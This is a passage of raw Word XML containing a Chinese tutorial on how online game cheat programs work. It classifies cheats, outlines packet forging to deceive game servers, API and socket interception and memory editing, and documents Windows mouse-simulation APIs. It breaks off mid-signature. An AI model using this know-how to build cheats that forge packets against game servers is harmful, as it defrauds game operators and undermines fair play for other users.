      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　所谓游戏外挂，其实是一种游戏外辅程序，它可以协助玩家自动产生游戏动作、修改游戏网络数据包以及修改游戏内存数据等，以实现玩家用最少的时间和金钱去完成功力升级和过关斩将。虽然，现在对游戏外挂程序的“合法”身份众说纷纭，在这里我不想对此发表任何个人意见，让时间去说明一切吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　不管游戏外挂程序是不是“合法”身份，但是它却是具有一定的技术含量的，在这些小小程序中使用了许多高端技术，如拦截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术、拦截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术、模拟键盘与鼠标技术、直接修改程序内存技术等等。本文将对常见的游戏外挂中使用的技术进行全面剖析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　二、认识外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　游戏外挂的历史可以追溯到单机版游戏时代，只不过当时它使用了另一个更通俗易懂的名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏修改器。它可以在游戏中追踪锁定游戏主人公的各项能力数值。这样玩家在游戏中可以达到主角不掉血、不耗费魔法、不消耗金钱等目的。这样降低了游戏的难度，使得玩家更容易通关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　随着网络游戏的时代的来临，游戏外挂在原有的功能之上进行了新的发展，它变得更加多种多样，功能更加强大，操作更加简单，以至有些游戏的外挂已经成为一个体系，比如《石器时代》，外挂品种达到了几十种，自动战斗、自动行走、自动练级、自动补血、加速、不遇敌、原地遇敌、快速增加经验值、按键精灵……几乎无所不包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　游戏外挂的设计主要是针对于某个游戏开发的，我们可以根据它针对的游戏的类型可大致可将外挂分为两种大类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　一类是将游戏中大量繁琐和无聊的攻击动作使用外挂自动完成，以帮助玩家轻松搞定攻击对象并可以快速的增加玩家的经验值。比如在《龙族》中有一种工作的设定，玩家的工作等级越高，就可以驾驭越好的装备。但是增加工作等级却不是一件有趣的事情，毋宁说是重复枯燥的机械劳动。如果你想做法师用的杖，首先需要做基本工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>砍树。砍树的方法很简单，在一棵大树前不停的点鼠标就可以了，每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的经验升一级。这就意味着玩家要在大树前不停的点击鼠标，这种无聊的事情通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按键精灵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以解决。外挂的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按键精灵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能可以让玩家摆脱无趣的点击鼠标的工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　另一类是由外挂程序产生欺骗性的网络游戏封包，并将这些封包发送到网络游戏服务器，利用这些虚假信息欺骗服务器进行游戏数值的修改，达到修改角色能力数值的目的。这类外挂程序针对性很强，一般在设计时都是针对某个游戏某个版本来做的，因为每个网络游戏服务器与客户端交流的数据包各不相同，外挂程序必须要对欺骗的网络游戏服务器的数据包进行分析，才能产生服务器识别的数据包。这类外挂程序也是当前最流利的一类游戏外挂程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　另外，现在很多外挂程序功能强大，不仅实现了自动动作代理和封包功能，而且还提供了对网络游戏的客户端程序的数据进行修改，以达到欺骗网络游戏服务器的目的。我相信，随着网络游戏商家的反外挂技术的进展，游戏外挂将会产生更多更优秀的技术，让我们期待着看场技术大战吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　三、外挂技术综述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　可以将开发游戏外挂程序的过程大体上划分为两个部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　前期部分工作是对外挂的主体游戏进行分析，不同类型的外挂分析主体游戏的内容也不相同。如外挂为上述谈到的外挂类型中的第一类时，其分析过程常是针对游戏的场景中的攻击对象的位置和分布情况进行分析，以实现外挂自动进行攻击以及位置移动。如外挂为外挂类型中的第二类时，其分析过程常是针对游戏服务器与客户端之间通讯包数据的结构、内容以及加密算法的分析。因网络游戏公司一般都不会公布其游戏产品的通讯包数据的结构、内容和加密算法的信息，所以对于开发第二类外挂成功的关键在于是否能正确分析游戏包数据的结构、内容以及加密算法，虽然可以使用一些工具辅助分析，但是这还是一种坚苦而复杂的工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　后期部分工作主要是根据前期对游戏的分析结果，使用大量的程序开发技术编写外挂程序以实现对游戏的控制或修改。如外挂程序为第一类外挂时，通常会使用到鼠标模拟技术来实现游戏角色的自动位置移动，使用键盘模拟技术来实现游戏角色的自动攻击。如外挂程序为第二类外挂时，通常会使用到挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数技术，以挡截游戏服务器传来的网络数据包并将数据包修改后封包后传给游戏服务器。另外，还有许多外挂使用对游戏客户端程序内存数据修改技术以及游戏加速技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　本文主要是针对开发游戏外挂程序后期使用的程序开发技术进行探讨，重点介绍的如下几种在游戏外挂中常使用的程序开发技术：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　●</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作模拟技术：主要包括键盘模拟技术和鼠标模拟技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　●</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封包技术：主要包括挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术和挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、动作模拟技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们在前面介绍过，几乎所有的游戏都有大量繁琐和无聊的攻击动作以增加玩家的功力，还有那些数不完的迷宫，这些好像已经成为了角色游戏的代名词。现在，外挂可以帮助玩家从这些繁琐而无聊的工作中摆脱出来，专注于游戏情节的进展。外挂程序为了实现自动角色位置移动和自动攻击等功能，需要使用到键盘模拟技术和鼠标模拟技术。下面我们将重点介绍这些技术并编写一个简单的实例帮助读者理解动作模拟技术的实现过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　１．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标模拟技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　几乎所有的游戏中都使用了鼠标来改变角色的位置和方向，玩家仅用一个小小的鼠标，就可以使角色畅游天下。那么，我们如何实现在没有玩家的参与下角色也可以自动行走呢。其实实现这个并不难，仅仅几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数就可以搞定，让我们先来认识认识这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟鼠标动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mouse_event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它可以实现模拟鼠标按下和放开等动作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VOID mouse_event(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dwFlags, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标动作标识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dx, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标水平方向位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dy, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标垂直方向位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dwData, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标轮子转动的数量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dwExtraInfo // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个关联鼠标动作辅加信息。</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其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dwFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示了各种各样的鼠标动作和点击活动，它的常用取值如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MOUSEEVENTF_MOVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　表示模拟鼠标移动事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUSEEVENTF_LEFTDOWN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示模拟按下鼠标左键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUSEEVENTF_LEFTUP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示模拟放开鼠标左键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUSEEVENTF_RIGHTDOWN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示模拟按下鼠标右键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUSEEVENTF_RIGHTUP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示模拟放开鼠标右键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUSEEVENTF_MIDDLEDOWN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示模拟按下鼠标中键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUSEEVENTF_MIDDLEUP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示模拟放开鼠标中键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、设置和获取当前鼠标位置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。获取当前鼠标位置使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetCursorPos()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，设置当前鼠标位置使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetCursorPos()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BOOL GetCursorPos(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LPPOINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
